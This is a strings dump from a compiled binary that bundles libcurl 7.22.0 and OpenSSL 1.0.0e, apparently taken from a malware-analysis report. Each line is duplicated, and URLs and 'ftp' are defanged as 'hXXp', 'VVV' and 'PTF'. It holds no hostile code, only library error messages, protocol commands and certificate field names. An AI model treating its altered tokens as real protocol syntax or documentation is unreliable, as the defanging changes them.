Couldn't find host %s in the _netrc file; using defaults
PTF@example.com
PTF@example.com
Couldn't resolve host '%s'
Couldn't resolve host '%s'
Couldn't resolve proxy '%s'
Couldn't resolve proxy '%s'
User-Agent: %s
User-Agent: %s
Re-using existing connection! (#%ld) with host %s
Re-using existing connection! (#%ld) with host %s
%s://%s
%s://%s
Connection #%ld to host %s left intact
Connection #%ld to host %s left intact
operation aborted by callback
operation aborted by callback
ioctl callback returned error %d
ioctl callback returned error %d
the ioctl callback returned %d
the ioctl callback returned %d
seek callback returned error %d
seek callback returned error %d
Problem (%d) in the Chunked-Encoded data
Problem (%d) in the Chunked-Encoded data
HTTP server doesn't seem to support byte ranges. Cannot resume.
HTTP server doesn't seem to support byte ranges. Cannot resume.
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Excess found in a non pipelined read: excess = %zd url = %s (zero-length body)
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Unrecognized content encoding type. libcurl understands `identity', `deflate' and `gzip' content encodings.
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Excess found in a non pipelined read: excess = %zu, size = %lld, maxdownload = %lld, bytecount = %lld
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zu bytes on url %s (size = %lld, maxdownload = %lld, bytecount = %lld, nread = %zd)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Rewinding stream by : %zd bytes on url %s (zero-length body)
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Operation timed out after %ld milliseconds with %lld out of %lld bytes received
Added %s:%d:%s to DNS cache
Added %s:%d:%s to DNS cache
Resolve %s found illegal!
Resolve %s found illegal!
%5[^:]:%d:%5s
%5[^:]:%d:%5s
No URL set!
No URL set!
[^?&/:]://%c
[^?&/:]://%c
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.2 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Violate RFC 2616/10.3.3 and switch from POST to GET
Disables POST, goes with %s
Disables POST, goes with %s
Issue another request to this URL: '%s'
Issue another request to this URL: '%s'
unspecified error %d
unspecified error %d
%s cookie %s="%s" for domain %s, path %s, expire %lld
%s cookie %s="%s" for domain %s, path %s, expire %lld
#HttpOnly_
#HttpOnly_
skipped cookie with bad tailmatch domain: %s
skipped cookie with bad tailmatch domain: %s
skipped cookie with illegal dotcount domain: %s
skipped cookie with illegal dotcount domain: %s
httponly
httponly
23[^;
23[^;
=]=I99[^;
=]=I99[^;
%s%s%s
%s%s%s
# Fatal libcurl error
# Fatal libcurl error
# Netscape HTTP Cookie File
# Netscape HTTP Cookie File
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# hXXp://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.
# This file was generated by libcurl! Edit at your own risk.
WARNING: failed to save cookies in %s
WARNING: failed to save cookies in %s
[%s %s %s]
[%s %s %s]
Send failure: %s
Send failure: %s
Recv failure: %s
Recv failure: %s
bind failed with errno %d: %s
bind failed with errno %d: %s
Local port: %hu
Local port: %hu
getsockname() failed with errno %d: %s
getsockname() failed with errno %d: %s
Bind to local port %hu failed, trying next
Bind to local port %hu failed, trying next
Couldn't bind to '%s'
Couldn't bind to '%s'
Name '%s' family %i resolved to '%s' family %i
Name '%s' family %i resolved to '%s' family %i
Local Interface %s is ip %s using address family %i
Local Interface %s is ip %s using address family %i
ssloc inet_ntop() failed with errno %d: %s
ssloc inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
ssrem inet_ntop() failed with errno %d: %s
getpeername() failed with errno %d: %s
getpeername() failed with errno %d: %s
TCP_NODELAY set
TCP_NODELAY set
Could not set TCP_NODELAY: %s
Could not set TCP_NODELAY: %s
Failed to connect to %s: %s
Failed to connect to %s: %s
Trying %s...
Trying %s...
sa_addr inet_ntop() failed with errno %d: %s
sa_addr inet_ntop() failed with errno %d: %s
Unable to parse FTP file list
Unable to parse FTP file list
Error in the SSH layer
Error in the SSH layer
Caller must register CURLOPT_CONV_ callback options
Caller must register CURLOPT_CONV_ callback options
TFTP: No such user
TFTP: No such user
TFTP: Unknown transfer ID
TFTP: Unknown transfer ID
TFTP: Illegal operation
TFTP: Illegal operation
TFTP: Access Violation
TFTP: Access Violation
TFTP: File Not Found
TFTP: File Not Found
Login denied
Login denied
Issuer check against peer certificate failed
Issuer check against peer certificate failed
Invalid LDAP URL
Invalid LDAP URL
Unrecognized or bad HTTP Content or Transfer-Encoding
Unrecognized or bad HTTP Content or Transfer-Encoding
Problem with the SSL CA cert (path? access rights?)
Problem with the SSL CA cert (path? access rights?)
Peer certificate cannot be authenticated with given CA certificates
Peer certificate cannot be authenticated with given CA certificates
Problem with the local SSL certificate
Problem with the local SSL certificate
SSL peer certificate or SSH remote key was not OK
SSL peer certificate or SSH remote key was not OK
An unknown option was passed in to libcurl
An unknown option was passed in to libcurl
A libcurl function was given a bad argument
A libcurl function was given a bad argument
Operation was aborted by an application callback
Operation was aborted by an application callback
FTP: command REST failed
FTP: command REST failed
FTP: command PORT failed
FTP: command PORT failed
HTTP response code said error
HTTP response code said error
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't retrieve (RETR failed) the specified file
FTP: couldn't set file type
FTP: couldn't set file type
FTP: can't figure out the host in the PASV response
FTP: can't figure out the host in the PASV response
FTP: unknown 227 response format
FTP: unknown 227 response format
FTP: unknown PASV reply
FTP: unknown PASV reply
FTP: unknown PASS reply
FTP: unknown PASS reply
FTP: The server did not accept the PRET command.
FTP: The server did not accept the PRET command.
FTP: weird server reply
FTP: weird server reply
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
A requested feature, protocol or option was not found built-in in this libcurl due to a build-time decision.
URL using bad/illegal format or missing URL
URL using bad/illegal format or missing URL
Unsupported protocol
Unsupported protocol
Winsock version not supported
Winsock version not supported
Protocol family not supported
Protocol family not supported
Address family not supported
Address family not supported
Operation not supported
Operation not supported
Socket is unsupported
Socket is unsupported
Protocol is unsupported
Protocol is unsupported
Protocol option is unsupported
Protocol option is unsupported
Unknown error %d (%#x)
Unknown error %d (%#x)
Internal error removing splay node = %d
Internal error removing splay node = %d
Internal error clearing splay node = %d
Internal error clearing splay node = %d
libcurl is now using a weak random seed!
libcurl is now using a weak random seed!
not supported file type '%s' for certificate
not supported file type '%s' for certificate
file type P12 for certificate not supported
file type P12 for certificate not supported
file type ENG for certificate not implemented
file type ENG for certificate not implemented
not supported file type for private key
not supported file type for private key
Private key does not match the certificate public key
Private key does not match the certificate public key
file type P12 for private key not supported
file type P12 for private key not supported
file type ENG for private key not supported
file type ENG for private key not supported
unable to set private key file: '%s' type %s
unable to set private key file: '%s' type %s
unable to use client certificate (no key found or wrong pass phrase?)
unable to use client certificate (no key found or wrong pass phrase?)
SSL Engine not supported
SSL Engine not supported
select/poll on SSL socket, errno: %d
select/poll on SSL socket, errno: %d
SSL read: %s, errno %d
SSL read: %s, errno %d
d-d-d d:d:d %s
d-d-d d:d:d %s
common name: %s (matched)
common name: %s (matched)
common name: %s (does not match '%s')
common name: %s (does not match '%s')
SSL: certificate subject name '%s' does not match target host name '%s'
SSL: certificate subject name '%s' does not match target host name '%s'
SSL: unable to obtain common name from peer certificate
SSL: unable to obtain common name from peer certificate
SSL: illegal cert name field
SSL: illegal cert name field
subjectAltName does not match %s
subjectAltName does not match %s
subjectAltName: %s matched
subjectAltName: %s matched
CERT verify
CERT verify
Client key exchange
Client key exchange
Server key exchange
Server key exchange
CERT
CERT
Client CERT
Client CERT
Request CERT
Request CERT
Client key
Client key
SSLv%c, %s%s (%d):
SSLv%c, %s%s (%d):
SSL: SSL_set_fd failed: %s
SSL: SSL_set_fd failed: %s
SSL: SSL_set_session failed: %s
SSL: SSL_set_session failed: %s
error loading CRL file: %s
error loading CRL file: %s
CRLfile: %s
CRLfile: %s
CAfile: %s
CAfile: %s
CApath: %s
CApath: %s
successfully set certificate verify locations:
successfully set certificate verify locations:
error setting certificate verify locations, continuing anyway:
error setting certificate verify locations, continuing anyway:
error setting certificate verify locations:
error setting certificate verify locations:
SSL: couldn't create a context: %s
SSL: couldn't create a context: %s
SSL connection using %s
SSL connection using %s
SSL certificate problem, verify that the CA cert is OK. Details:
SSL certificate problem, verify that the CA cert is OK. Details:
Unknown SSL protocol error in connection to %s:%ld
Unknown SSL protocol error in connection to %s:%ld
%s: %s
%s: %s
x:
x:
%s(%s)
%s(%s)
%s: %s
%s: %s
Signature: %s
Signature: %s
Cert
Cert
RSA Public Key
RSA Public Key
RSA Public Key (%d bits)
RSA Public Key (%d bits)
pub_key
pub_key
priv_key
priv_key
Unable to load public key
Unable to load public key
Public Key Algorithm
Public Key Algorithm
Public Key Algorithm: %s
Public Key Algorithm: %s
Expire date: %s
Expire date: %s
Start date: %s
Start date: %s
Serial Number: %s
Serial Number: %s
x%c
x%c
Signature Algorithm: %s
Signature Algorithm: %s
Issuer: %s
Issuer: %s
- Subject: %s
- Subject: %s
--- Certificate chain
--- Certificate chain
SSL certificate verify ok.
SSL certificate verify ok.
SSL certificate verify result: %s (%ld), continuing anyway.
SSL certificate verify result: %s (%ld), continuing anyway.
SSL certificate verify result: %s (%ld)
SSL certificate verify result: %s (%ld)
SSL certificate issuer check ok (%s)
SSL certificate issuer check ok (%s)
SSL: Certificate issuer check failed (%s)
SSL: Certificate issuer check failed (%s)
SSL: Unable to read issuer cert (%s)
SSL: Unable to read issuer cert (%s)
SSL: Unable to open issuer cert (%s)
SSL: Unable to open issuer cert (%s)
issuer: %s
issuer: %s
expire date: %s
expire date: %s
start date: %s
start date: %s
subject: %s
subject: %s
Server certificate:
Server certificate:
SSL: couldn't get peer certificate!
SSL: couldn't get peer certificate!
SSL_write() return error %d
SSL_write() return error %d
SSL_write() error: %s
SSL_write() error: %s
SSL_write() returned SYSCALL, errno = %d
SSL_write() returned SYSCALL, errno = %d
--:--:--
--:--:--
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
%3lld %s %3lld %s %3lld %s %s %s %s %s %s %s
%s%s%s%s%s%s
%s%s%s%s%s%s
Session: %s
Session: %s
%s %s RTSP/1.0
%s %s RTSP/1.0
Range: %s
Range: %s
Referer: %s
Referer: %s
Accept-Encoding: %s
Accept-Encoding: %s
Refusing to issue an RTSP SETUP without a Transport: header.
Refusing to issue an RTSP SETUP without a Transport: header.
Transport: %s
Transport: %s
Transport:
Transport:
Refusing to issue an RTSP request [%s] without a session ID.
Refusing to issue an RTSP request [%s] without a session ID.
Got RTSP Session ID Line [%s], but wanted ID [%s]
Got RTSP Session ID Line [%s], but wanted ID [%s]
Unable to read the CSeq header: [%s]
Unable to read the CSeq header: [%s]
SMTPS
SMTPS
SMTP
SMTP
EHLO %s
EHLO %s
HELO %s
HELO %s
AUTH %s
AUTH %s
No known auth mechanisms supported!
No known auth mechanisms supported!
AUTH %s %s
AUTH %s %s
LOGIN
LOGIN
Access denied: %d
Access denied: %d
%s xxxxxxxxxxxxxxxx
%s xxxxxxxxxxxxxxxx
Authentication failed: %d
Authentication failed: %d
MAIL FROM:
MAIL FROM:
MAIL FROM:%s
MAIL FROM:%s
RCPT TO:
RCPT TO:
RCPT TO:%s
RCPT TO:%s
STARTTLS denied. %c
STARTTLS denied. %c
Got unexpected smtp-server response: %d
Got unexpected smtp-server response: %d
USER %s
USER %s
PASS %s
PASS %s
Access denied. %c
Access denied. %c
Invalid message. %c
Invalid message. %c
RETR %s
RETR %s
LIST %s
LIST %s
%s LOGIN %s %s
%s LOGIN %s %s
%s SELECT %s
%s SELECT %s
%s FETCH 1 BODY[TEXT]
%s FETCH 1 BODY[TEXT]
%s LOGOUT
%s LOGOUT
%s STARTTLS
%s STARTTLS
TFTP
TFTP
set timeouts for state %d; Total %ld, retry %d maxtry %d
set timeouts for state %d; Total %ld, retry %d maxtry %d
invalid tsize -:%s:- value in OACK packet
invalid tsize -:%s:- value in OACK packet
%s (%ld)
%s (%ld)
blksize is smaller than min supported
blksize is smaller than min supported
%s (%d)
%s (%d)
blksize is larger than max supported
blksize is larger than max supported
%s (%d) %s (%d)
%s (%d) %s (%d)
got option=(%s) value=(%s)
got option=(%s) value=(%s)
tftp_rx: internal error
tftp_rx: internal error
Timeout waiting for block %d ACK. Retries = %d
Timeout waiting for block %d ACK. Retries = %d
tftp_rx: giving up waiting for block %d
tftp_rx: giving up waiting for block %d
Received unexpected DATA packet block %d
Received unexpected DATA packet block %d
tftp_tx: internal error, event: %i
tftp_tx: internal error, event: %i
tftp_tx: giving up waiting for block %d ack
tftp_tx: giving up waiting for block %d ack
Received ACK for block %d, expecting %d
Received ACK for block %d, expecting %d
bind() failed; %s
bind() failed; %s
tftp_send_first: internal error
tftp_send_first: internal error
%s%c%s%c
%s%c%s%c
TFTP finished
TFTP finished
TFTP response timeout
TFTP response timeout
Can't get the size of %s
Can't get the size of %s
Can't open %s for writing
Can't open %s for writing
Last-Modified: %s, d %s M d:d:d GMT
Last-Modified: %s, d %s M d:d:d GMT
Couldn't open file %s
Couldn't open file %s
There are more than %d entries
There are more than %d entries
LDAP remote: %s
LDAP remote: %s
LDAP local: ldap_simple_bind_s %s
LDAP local: ldap_simple_bind_s %s
LDAP local: Cannot connect to %s:%hu
LDAP local: Cannot connect to %s:%hu
LDAP local: trying to establish %s connection
LDAP local: trying to establish %s connection
LDAP local: %s
LDAP local: %s
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
LDAP local: LDAP Vendor = %s ; LDAP Version = %d
CLIENT libcurl 7.22.0
CLIENT libcurl 7.22.0
MATCH %s %s %s
MATCH %s %s %s
DEFINE %s %s
DEFINE %s %s
insufficient winsock version to support telnet
insufficient winsock version to support telnet
WSAStartup failed (%d)
WSAStartup failed (%d)
%s %d %d
%s %d %d
%s %s %d
%s %s %d
%s %s %s
%s %s %s
%s IAC %d
%s IAC %d
%s IAC %s
%s IAC %s
Sending data failed (%d)
Sending data failed (%d)
%d (unknown)
%d (unknown)
%s (unsupported)
%s (unsupported)
%s IAC SB
%s IAC SB
Syntax error in telnet option: %s
Syntax error in telnet option: %s
Unknown telnet option %s
Unknown telnet option %s
7[^= ]%*[ =]%5s
7[^= ]%*[ =]%5s
USER,%s
USER,%s
%c%c%c%c%s%c%c
%c%c%c%c%s%c%c
%c%s%c%s
%c%s%c%s
7[^,],7s
7[^,],7s
%c%c%c%c
%c%c%c%c
FreeLibrary(wsock2) failed (%d)
FreeLibrary(wsock2) failed (%d)
WSACloseEvent failed (%d)
WSACloseEvent failed (%d)
WSAEnumNetworkEvents failed (%d)
WSAEnumNetworkEvents failed (%d)
WSACreateEvent failed (%d)
WSACreateEvent failed (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEnumNetworkEvents function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSAEventSelect function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACloseEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to find WSACreateEvent function (%d)
failed to load WS2_32.DLL (%d)
failed to load WS2_32.DLL (%d)
WS2_32.DLL
WS2_32.DLL
FTPS
FTPS
PORT
PORT
FTP response aborted due to select/poll error: %d
FTP response aborted due to select/poll error: %d
FTP response timeout
FTP response timeout
%s %s
%s %s
,%d,%d
,%d,%d
%s |%d|%s|%hu|
%s |%d|%s|%hu|
bind() failed, we ran out of ports!
bind() failed, we ran out of ports!
bind(port=%hu) failed: %s
bind(port=%hu) failed: %s
socket failure: %s
socket failure: %s
Curl_resolv failed, we can not recover!
Curl_resolv failed, we can not recover!
getsockname() failed: %s
getsockname() failed: %s
Connect data stream passively
Connect data stream passively
PRET RETR %s
PRET RETR %s
PRET STOR %s
PRET STOR %s
PRET %s
PRET %s
REST %d
REST %d
SIZE %s
SIZE %s
STOR %s
STOR %s
APPE %s
APPE %s
Failed to do PORT
Failed to do PORT
Got a d response code instead of the assumed 200
Got a d response code instead of the assumed 200
ftp server doesn't support SIZE
ftp server doesn't support SIZE
Failed FTP upload:
Failed FTP upload:
RETR response: d
RETR response: d
PBSZ %d
PBSZ %d
Access denied: d
Access denied: d
ACCT %s
ACCT %s
ACCT rejected by server: d
ACCT rejected by server: d
TYPE %c
TYPE %c
Connecting to %s (%s) port %d
Connecting to %s (%s) port %d
Uploading to a URL without a file name!
Uploading to a URL without a file name!
MDTM %s
MDTM %s
Bad PASV/EPSV response: d
Bad PASV/EPSV response: d
Can't resolve new host %s:%hu
Can't resolve new host %s:%hu
Can't resolve proxy host %s:%hu
Can't resolve proxy host %s:%hu
Skips %d.%d.%d.%d for data connection, uses %s instead
Skips %d.%d.%d.%d for data connection, uses %s instead
%d,%d,%d,%d,%d,%d
%d,%d,%d,%d,%d,%d
%c%c%c%u%c
%c%c%c%u%c
ddd d:d:d GMT
ddd d:d:d GMT
dddddd
dddddd
unsupported MDTM reply format
unsupported MDTM reply format
QUOT string not accepted: %s
QUOT string not accepted: %s
Wildcard - "%s" skipped by user
Wildcard - "%s" skipped by user
Wildcard - START of "%s"
Wildcard - START of "%s"
CWD %s
CWD %s
PRET command not accepted: d
PRET command not accepted: d
Failed to MKD dir: d
Failed to MKD dir: d
MKD %s
MKD %s
QUOT command failed with d
QUOT command failed with d
Entry path is '%s'
Entry path is '%s'
PROT %c
PROT %c
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
unsupported parameter to CURLOPT_FTPSSLAUTH: %d
Got a d ftp-server response when 220 was expected
Got a d ftp-server response when 220 was expected
server did not report OK, got %d
server did not report OK, got %d
Remembering we are in dir "%s"
Remembering we are in dir "%s"
HTTPS
HTTPS
%sAuthorization: Basic %s
%sAuthorization: Basic %s
%s:%s
%s:%s
%s auth using %s with user '%s'
%s auth using %s with user '%s'
HTTP/
HTTP/
Avoided giant realloc for header (max is %d)!
Avoided giant realloc for header (max is %d)!
The requested URL returned error: %d
The requested URL returned error: %d
If-Unmodified-Since: %s
If-Unmodified-Since: %s
Last-Modified: %s
Last-Modified: %s
If-Modified-Since: %s
If-Modified-Since: %s
%s, d %s M d:d:d GMT
%s, d %s M d:d:d GMT
Failed sending HTTP POST request
Failed sending HTTP POST request
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Internal HTTP POST error!
Internal HTTP POST error!
Failed sending HTTP request
Failed sending HTTP request
%s%s=%s
%s%s=%s
%s HTTP/%s
%s HTTP/%s
%s%s%s%s%s%s%s%s%s%s%s
%s%s%s%s%s%s%s%s%s%s%s
PTF://%s:%s@%s
PTF://%s:%s@%s
Content-Range: bytes %s/%lld
Content-Range: bytes %s/%lld
Content-Range: bytes %s%lld/%lld
Content-Range: bytes %s%lld/%lld
Range: bytes=%s
Range: bytes=%s
PTF://
PTF://
Host: %s%s%s:%hu
Host: %s%s%s:%hu
Host: %s%s%s
Host: %s%s%s
Chunky upload is not supported by HTTP 1.0
Chunky upload is not supported by HTTP 1.0
%s, TE
%s, TE
HTTP error before end of send, stop sending
HTTP error before end of send, stop sending
HTTP/1.0 connection set to keep alive!
HTTP/1.0 connection set to keep alive!
HTTP/1.1 proxy connection set close!
HTTP/1.1 proxy connection set close!
HTTP/1.0 proxy connection set to keep alive!
HTTP/1.0 proxy connection set to keep alive!
HTTP 1.0, assume close after body
HTTP 1.0, assume close after body
RTSP/%d.%d =
RTSP/%d.%d =
HTTP =
HTTP =
HTTP/%d.%d =
HTTP/%d.%d =
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), Unknown.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because the client program and identd report different user-ids.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected because SOCKS server cannot connect to identd on the client.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
Can't complete SOCKS4 connection to %d.%d.%d.%d:%d. (%d), request rejected or failed.
SOCKS4%s request granted.
SOCKS4%s request granted.
Failed to resolve "%s" for SOCKS4 connect.
Failed to resolve "%s" for SOCKS4 connect.
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
No authentication method was acceptable. (It is quite likely that the SOCKS5 server wanted a username/password, since none was supplied to the server on this connection.)
SOCKS5 GSSAPI per-message authentication is not supported.
SOCKS5 GSSAPI per-message authentication is not supported.
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Can't complete SOCKS5 connection to %d.%d.%d.%d:%d. (%d)
Failed to resolve "%s" for SOCKS5 connect.
Failed to resolve "%s" for SOCKS5 connect.
User was rejected by the SOCKS5 server (%d %d).
User was rejected by the SOCKS5 server (%d %d).
password
password
login
login
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
Operation too slow. Less than %ld bytes/sec transferred the last %ld seconds
%sAuthorization: NTLM %s
%sAuthorization: NTLM %s
%s, algorithm="%s"
%s, algorithm="%s"
%s, opaque="%s"
%s, opaque="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%s", cnonce="%s", nc=x, qop="%s", response="%s"
%s:%s:x:%s:%s:%s
%s:%s:x:%s:%s:%s
%s:%.*s
%s:%.*s
%s:%s:%s
%s:%s:%s
Error while processing content unencoding: %s
Error while processing content unencoding: %s
1.2.0.4
1.2.0.4
d:d
d:d
%c%c==
%c%c==
%c%c%c=
%c%c%c=
Received HTTP code %d from proxy after CONNECT
Received HTTP code %d from proxy after CONNECT
HTTP/1.%d %d
HTTP/1.%d %d
CONNECT %s:%hu HTTP/%s
CONNECT %s:%hu HTTP/%s
%s%s%s%s
%s%s%s%s
Host: %s
Host: %s
%s:%hu
%s:%hu
Establish HTTP proxy tunnel to %s:%hu
Establish HTTP proxy tunnel to %s:%hu
0123456789-
0123456789-
.jpeg
.jpeg
.html
.html
--%s--
--%s--
couldn't open file "%s"
couldn't open file "%s"
Content-Type: %s
Content-Type: %s
; filename="%s"
; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Disposition: attachment; filename="%s"
Content-Type: multipart/mixed, boundary=%s
Content-Type: multipart/mixed, boundary=%s
%s; boundary=%s
%s; boundary=%s
NTLMSSP%c
NTLMSSP%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%s%s
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c%c
KGS!@#$%.rnd
KGS!@#$%.rnd
\X
\X
X.509 part of OpenSSL 1.0.0e 6 Sep 2011
X.509 part of OpenSSL 1.0.0e 6 Sep 2011
OPENSSL_ALLOW_PROXY_CERTS
OPENSSL_ALLOW_PROXY_CERTS
passed a null parameter
passed a null parameter
DSO support routines
DSO support routines
x509 certificate routines
x509 certificate routines
error:lX:%s:%s:%s
error:lX:%s:%s:%s
ASN.1 part of OpenSSL 1.0.0e 6 Sep 2011
ASN.1 part of OpenSSL 1.0.0e 6 Sep 2011
d.registeredID
d.registeredID
d.iPAddress
d.iPAddress
d.uniformResourceIdentifier
d.uniformResourceIdentifier
d.ediPartyName
d.ediPartyName
d.directoryName
d.directoryName
d.dNSName
d.dNSName
d.rfc822Name
d.rfc822Name
d.otherName
d.otherName
Stack part of OpenSSL 1.0.0e 6 Sep 2011
Stack part of OpenSSL 1.0.0e 6 Sep 2011
x%s
x%s
%s - d:d:d%.*s %d%s
%s - d:d:d%.*s %d%s
%*s
%*s
%*s%s
%*s%s
%*s%s:
%*s%s:
CERTIFICATE
CERTIFICATE
Big Number part of OpenSSL 1.0.0e 6 Sep 2011
Big Number part of OpenSSL 1.0.0e 6 Sep 2011
unsupported or invalid name syntax
unsupported or invalid name syntax
unsupported or invalid name constraint syntax
unsupported or invalid name constraint syntax
unsupported name constraint type
unsupported name constraint type
name constraints minimum and maximum not supported
name constraints minimum and maximum not supported
Unsupported extension feature
Unsupported extension feature
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate policy extension
invalid or inconsistent certificate extension
invalid or inconsistent certificate extension
key usage does not include digital signature
key usage does not include digital signature
key usage does not include CRL signing
key usage does not include CRL signing
unable to get CRL issuer certificate
unable to get CRL issuer certificate
key usage does not include certificate signing
key usage does not include certificate signing
authority and subject key identifier mismatch
authority and subject key identifier mismatch
certificate rejected
certificate rejected
certificate not trusted
certificate not trusted
unsupported certificate purpose
unsupported certificate purpose
proxy certificates not allowed, please set the appropriate flag
proxy certificates not allowed, please set the appropriate flag
invalid non-CA certificate (has CA markings)
invalid non-CA certificate (has CA markings)
invalid CA certificate
invalid CA certificate
certificate revoked
certificate revoked
certificate chain too long
certificate chain too long
unable to verify the first certificate
unable to verify the first certificate
unable to get local issuer certificate
unable to get local issuer certificate
self signed certificate in certificate chain
self signed certificate in certificate chain
self signed certificate
self signed certificate
format error in certificate's notAfter field
format error in certificate's notAfter field
format error in certificate's notBefore field
format error in certificate's notBefore field
certificate has expired
certificate has expired
certificate is not yet valid
certificate is not yet valid
certificate signature failure
certificate signature failure
unable to decode issuer public key
unable to decode issuer public key
unable to decrypt certificate's signature
unable to decrypt certificate's signature
unable to get certificate CRL
unable to get certificate CRL
unable to get issuer certificate
unable to get issuer certificate
cert_info
cert_info
OpenSSL 1.0.0e 6 Sep 2011
OpenSSL 1.0.0e 6 Sep 2011
MD5 part of OpenSSL 1.0.0e 6 Sep 2011
MD5 part of OpenSSL 1.0.0e 6 Sep 2011
libdes part of OpenSSL 1.0.0e 6 Sep 2011
libdes part of OpenSSL 1.0.0e 6 Sep 2011
DES part of OpenSSL 1.0.0e 6 Sep 2011
DES part of OpenSSL 1.0.0e 6 Sep 2011
MD4 part of OpenSSL 1.0.0e 6 Sep 2011
MD4 part of OpenSSL 1.0.0e 6 Sep 2011
RAND part of OpenSSL 1.0.0e 6 Sep 2011
RAND part of OpenSSL 1.0.0e 6 Sep 2011
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
You need to read the OpenSSL FAQ, hXXp://VVV.openssl.org/support/faq.html
RSA part of OpenSSL 1.0.0e 6 Sep 2011
RSA part of OpenSSL 1.0.0e 6 Sep 2011
DSA part of OpenSSL 1.0.0e 6 Sep 2011
DSA part of OpenSSL 1.0.0e 6 Sep 2011
.\crypto\ec\ec_key.c
.\crypto\ec\ec_key.c
Diffie-Hellman part of OpenSSL 1.0.0e 6 Sep 2011
Diffie-Hellman part of OpenSSL 1.0.0e 6 Sep 2011
supportedAlgorithms
supportedAlgorithms
crossCertificatePair
crossCertificatePair
certificateRevocationList
certificateRevocationList
cACertificate
cACertificate
userCertificate
userCertificate
userPassword
userPassword
supportedApplicationContext
supportedApplicationContext
Microsoft Local Key set
Microsoft Local Key set
LocalKeySet
LocalKeySet
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-None-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
id-Gost28147-89-CryptoPro-KeyMeshing
password based MAC
password based MAC
id-PasswordBasedMAC
id-PasswordBasedMAC
X509v3 Certificate Issuer
X509v3 Certificate Issuer
certificateIssuer
certificateIssuer
certicom-arc
certicom-arc
Proxy Certificate Information
Proxy Certificate Information
proxyCertInfo
proxyCertInfo
Microsoft Smartcardlogin
Microsoft Smartcardlogin
msSmartcardLogin
msSmartcardLogin
joint-iso-itu-t
joint-iso-itu-t
JOINT-ISO-ITU-T
JOINT-ISO-ITU-T
set-rootKeyThumb
set-rootKeyThumb
setAttr-Cert
setAttr-Cert
setCext-cCertRequired
setCext-cCertRequired
setCext-certType
setCext-certType
setct-CertResTBE
setct-CertResTBE
setct-CertReqTBEX
setct-CertReqTBEX
setct-CertReqTBE
setct-CertReqTBE
setct-AcqCardCodeMsgTBE
setct-AcqCardCodeMsgTBE
setct-CertInqReqTBS
setct-CertInqReqTBS
setct-CertResData
setct-CertResData
setct-CertReqTBS
setct-CertReqTBS
setct-CertReqData
setct-CertReqData
setct-PCertResTBS
setct-PCertResTBS
setct-PCertReqData
setct-PCertReqData
setct-AcqCardCodeMsg
setct-AcqCardCodeMsg
certificate extensions
certificate extensions
set-certExt
set-certExt
set-msgExt
set-msgExt
id-ecPublicKey
id-ecPublicKey
id-cmc-confirmCertAcceptance
id-cmc-confirmCertAcceptance
id-cmc-getCert
id-cmc-getCert
id-regInfo-certReq
id-regInfo-certReq
id-regCtrl-protocolEncrKey
id-regCtrl-protocolEncrKey
id-regCtrl-oldCertID
id-regCtrl-oldCertID
id-it-revPassphrase
id-it-revPassphrase
id-it-keyPairParamRep
id-it-keyPairParamRep
id-it-keyPairParamReq
id-it-keyPairParamReq
id-it-unsupportedOIDs
id-it-unsupportedOIDs
